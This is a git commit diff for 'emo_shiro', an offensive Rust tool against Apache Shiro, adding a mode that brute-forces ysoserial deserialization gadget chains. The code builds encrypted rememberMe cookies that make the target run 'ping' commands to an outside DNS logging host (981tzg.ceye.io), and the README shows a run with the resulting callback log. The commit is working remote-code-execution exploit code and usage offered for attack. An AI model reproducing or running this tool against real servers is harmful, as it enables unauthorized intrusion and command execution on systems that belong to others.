爆破利用链

Author: cn-kali-team

CHANGELOG.md

@@ -14,4 +14,4 @@
 
 ### Fixes
 
-- 添加内置payload
+- 添加内置payload，添加爆破利用链

README.md

@@ -2,7 +2,7 @@
 
 ```bash
 ➜  ~ ./emo_shiro --help
-Usage: emo_shiro [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]
+Usage: emo_shiro [--key <key>] [-m <mode>] [-t <target>] [-s <ser>] [--file <file>] [--keys <keys>] [--csv <csv>] [--proxy <proxy>] [--timeout <timeout>] [--thread <thread>] [--chain] [--exploit] [--dns <dns>] [-p <payload>] [-c <command>] [--echo-name <echo-name>] [--command-name <command-name>] [-l]
 
 emo_shiro
 
@@ -18,6 +18,7 @@ Options:
                     (ex:[http(s)|socks5(h)]://host:port)
   --timeout         set request timeout
   --thread          number of concurrent threads
+  --chain           enum chain mode
   --exploit         exploit mode
   --dns             dns identifier, default: 981tzg.ceye.io
   -p, --payload     select a payload
@@ -43,6 +44,7 @@ Options:
 - `--dns`验证的DNS服务器，请求为目标的`主机名_端口.你的DNS记录服务器`，默认为`981tzg.ceye.io`
 - `-p`使用内置payload，配合`-c`或者`--dns`和`--echo-name`，`--command-name`，tomcat回显后面再更新
 - `-l`列出内置payload
+- `--chain`枚举利用链，结果查看DNS记录服务，前缀就是利用链名称。
 
 ## 使用ysoserial文件
 
@@ -68,6 +70,33 @@ Options:
 
 ```
 
+## 爆破利用链
+
+- 主要利用ping命令带上利用链名称拼接到DNS前缀，如果能在DNS记录中看到说明可以使用该利用链
+
+```bash
+➜  emo_shiro git:(main) ✗ cargo run -- -t http://127.0.0.1:8080 --exploit --dns 981tzg.ceye.io --chain
++-------------------------------------------------------------------------+--------+--------+------+--------------------------+
+| url                                                                     | method | verify | mode | key                      |
++=========================================================================+========+========+======+==========================+
+| http://127.0.0.1:8080/login;jsessionid=E01994D45911DE55FCE6606CFFF48AC7 | GET    | true   | CBC  | kPH+bIxk5D2deZiIxcaaaA== |
++-------------------------------------------------------------------------+--------+--------+------+--------------------------+
+
+```
+
+- 查看DNS记录得到可用利用链，说明`bs1`,`cck3`,`cc5`,`cc7`,`cck1`和`cc6`利用链可用
+
+```csv
+969227011	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:20
+969226980	bs1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:19
+969226976	ccK3.127.0.0.1.8080.981tZG.cEYE.Io	127.0.0.1	2022-12-22 13:48:19
+969226947	cc5.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
+969226945	cc7.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
+969226936	cCK3.127.0.0.1.8080.981tzg.ceyE.iO	127.0.0.1	2022-12-22 13:48:18
+969226932	cck1.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:18
+969226818	cc6.127.0.0.1.8080.981tzg.ceye.io	127.0.0.1	2022-12-22 13:48:14
+```
+
 ## 使用内置ysoserial
 
 - payload来自：(ysoserial_rs)[https://github.com/emo-cat/ysoserial_rs]

src/cli.rs

@@ -33,6 +33,9 @@ pub struct EmoArgs {
     /// number of concurrent threads
     #[argh(option, default = "default_thread()")]
     pub thread: u32,
+    /// enum chain mode
+    #[argh(switch)]
+    pub chain: bool,
     /// exploit mode
     #[argh(switch)]
     pub exploit: bool,

src/lib.rs

@@ -1,5 +1,6 @@
 pub mod cli;
 pub mod yso;
+
 use anyhow::anyhow;
 use cli::EmoArgs;
 use encoding_rs::{Encoding, UTF_8};
@@ -30,6 +31,12 @@ pub struct RawData {
 }
 
 pub static EMO_ARGS: Lazy<EmoArgs> = Lazy::new(|| -> EmoArgs { EmoArgs::new() });
+static CIPHERS: Lazy<HashMap<&str, Cipher>> = Lazy::new(|| -> HashMap<&str, Cipher> {
+    HashMap::from([
+        ("CBC", Cipher::aes_128_cbc()),
+        ("GCM", Cipher::aes_128_gcm()),
+    ])
+});
 
 /// 发送请求，并带上apache-shiro的请求头
 async fn send_requests(
@@ -188,11 +195,7 @@ impl ShiroVerify {
         }
         let target = self.target.as_ref().unwrap();
         let shiro_spc = yso::get_payload("shiro_spc");
-        let ciphers = HashMap::from([
-            ("CBC", Cipher::aes_128_cbc()),
-            ("GCM", Cipher::aes_128_gcm()),
-        ]);
-        for (mode, cipher) in ciphers {
+        for (mode, cipher) in CIPHERS.clone().into_iter() {
             if let Some(m) = &EMO_ARGS.mode {
                 if mode != m {
                     continue;
@@ -227,19 +230,31 @@ impl ShiroVerify {
         if self.mode.is_empty() || !self.verify {
             return;
         }
-        let ciphers = HashMap::from([
-            ("CBC", Cipher::aes_128_cbc()),
-            ("GCM", Cipher::aes_128_gcm()),
-        ]);
         let key = self.key.clone().unwrap_or_default();
-        if let Some(cipher) = ciphers.get(self.mode.as_str()) {
+        if let Some(cipher) = CIPHERS.get(self.mode.as_str()) {
             if let Some(target) = self.target.clone() {
                 let headers = ser_to_header(&target, key, cipher);
                 let _ = send_requests(&target, self.method.clone(), headers).await;
             }
         }
     }
+    pub async fn enum_chain(&mut self) {
+        if self.mode.is_empty() || !self.verify {
+            return;
+        }
+        let key = self.key.clone().unwrap_or_default();
+        if let Some(cipher) = CIPHERS.get(self.mode.as_str()) {
+            if let Some(target) = self.target.clone() {
+                for (p, _) in yso::COMMAND_PAYLOAD_MAP.clone().into_iter() {
+                    let headers =
+                        make_remember_me(&key, *cipher, &yso::get_enum_chain_payload(p, &target));
+                    let _ = send_requests(&target, self.method.clone(), headers).await;
+                }
+            }
+        }
+    }
 }
+
 fn ser_to_header(target: &Url, key: String, cipher: &Cipher) -> HeaderMap {
     let default_header = HeaderMap::new();
     if let Some(path) = &EMO_ARGS.ser {
@@ -267,6 +282,7 @@ fn ser_to_header(target: &Url, key: String, cipher: &Cipher) -> HeaderMap {
 
     make_remember_me(&key, *cipher, &ysoserial_rs::get_url_dns(&u))
 }
+
 pub fn print_results_and_save(results: Vec<ShiroVerify>) {
     let mut table = Table::new();
     let headers = vec![

src/main.rs

@@ -12,16 +12,24 @@ async fn main() {
         Err(e) => println!("{}", e),
     }
 }
+
 async fn burst(mut sv: ShiroVerify) -> ShiroVerify {
     sv.burst_key().await;
     sv
 }
+
 async fn exploit(mut sv: ShiroVerify) -> ShiroVerify {
+    // 爆破利用链
+    if EMO_ARGS.chain {
+        sv.enum_chain().await;
+    }
+    // 利用
     if EMO_ARGS.exploit {
         sv.exploit().await;
     }
     sv
 }
+
 async fn start() -> Result<(), Error> {
     if EMO_ARGS.list {
         yso::list();

src/yso.rs

@@ -1,12 +1,15 @@
 use crate::EMO_ARGS;
 use once_cell::sync::Lazy;
+use reqwest::Url;
 use std::collections::HashMap;
 use std::process;
 use ysoserial_rs::*;
+
 type NoArgs = fn() -> Vec<u8>;
 type OneArgs = fn(&str) -> Vec<u8>;
 type TwoArgs = fn(&str, &str) -> Vec<u8>;
-static COMMAND_PAYLOAD_MAP: Lazy<HashMap<&str, OneArgs>> =
+
+pub static COMMAND_PAYLOAD_MAP: Lazy<HashMap<&str, OneArgs>> =
     Lazy::new(|| -> HashMap<&str, OneArgs> {
         HashMap::from_iter([
             ("bs1", get_commons_beanutils1 as OneArgs),
@@ -39,13 +42,14 @@ static COMMAND_PAYLOAD_MAP: Lazy<HashMap<&str, OneArgs>> =
             ("vaadin1", get_vaadin1),
         ])
     });
-static URL_PAYLOAD_MAP: Lazy<HashMap<&str, OneArgs>> = Lazy::new(|| -> HashMap<&str, OneArgs> {
-    HashMap::from_iter([
-        ("url_dns", get_url_dns as OneArgs),
-        ("c3p0", get_c3p0 as OneArgs),
-    ])
-});
-static HEADER_PAYLOAD_MAP: Lazy<HashMap<&str, TwoArgs>> =
+pub static URL_PAYLOAD_MAP: Lazy<HashMap<&str, OneArgs>> =
+    Lazy::new(|| -> HashMap<&str, OneArgs> {
+        HashMap::from_iter([
+            ("url_dns", get_url_dns as OneArgs),
+            ("c3p0", get_c3p0 as OneArgs),
+        ])
+    });
+pub static HEADER_PAYLOAD_MAP: Lazy<HashMap<&str, TwoArgs>> =
     Lazy::new(|| -> HashMap<&str, TwoArgs> {
         HashMap::from_iter([
             ("cck1_tomcat_echo", get_cck1_tomcat_echo as TwoArgs),
@@ -55,6 +59,7 @@ static HEADER_PAYLOAD_MAP: Lazy<HashMap<&str, TwoArgs>> =
 static SHIRO_PAYLOAD_MAP: Lazy<HashMap<&str, NoArgs>> = Lazy::new(|| -> HashMap<&str, NoArgs> {
     HashMap::from_iter([("shiro_spc", get_shiro_simple_principal_collection as NoArgs)])
 });
+
 pub fn list() {
     println!("Payload List:\n------------");
     let mut all_payload = COMMAND_PAYLOAD_MAP
@@ -85,6 +90,7 @@ pub fn list() {
     }
     process::exit(0);
 }
+
 pub fn get_payload(p: &str) -> Vec<u8> {
     if let Some(command_func) = COMMAND_PAYLOAD_MAP.get(p as &str) {
         if let Some(cmd) = &EMO_ARGS.command {
@@ -111,3 +117,28 @@ pub fn get_payload(p: &str) -> Vec<u8> {
         process::exit(0);
     }
 }
+
+pub fn get_enum_chain_payload(p: &str, target: &Url) -> Vec<u8> {
+    let dns = format!(
+        "{}.{}.{}.{}",
+        p,
+        target.host_str().unwrap_or_default(),
+        target.port_or_known_default().unwrap_or_default(),
+        EMO_ARGS.dns
+    );
+    let ping = format!("ping -n 2 -w 2 {}", dns);
+    if let Some(command_func) = COMMAND_PAYLOAD_MAP.get(p as &str) {
+        command_func(&ping)
+    } else if let Some(url_func) = URL_PAYLOAD_MAP.get(p as &str) {
+        return url_func(&format!("http://{}", &dns));
+    } else if let Some(header_func) = HEADER_PAYLOAD_MAP.get(p as &str) {
+        if let (Some(echo_name), Some(command_name)) = (&EMO_ARGS.echo_name, &EMO_ARGS.command_name)
+        {
+            header_func(echo_name, command_name)
+        } else {
+            Vec::new()
+        }
+    } else {
+        Vec::new()
+    }
+}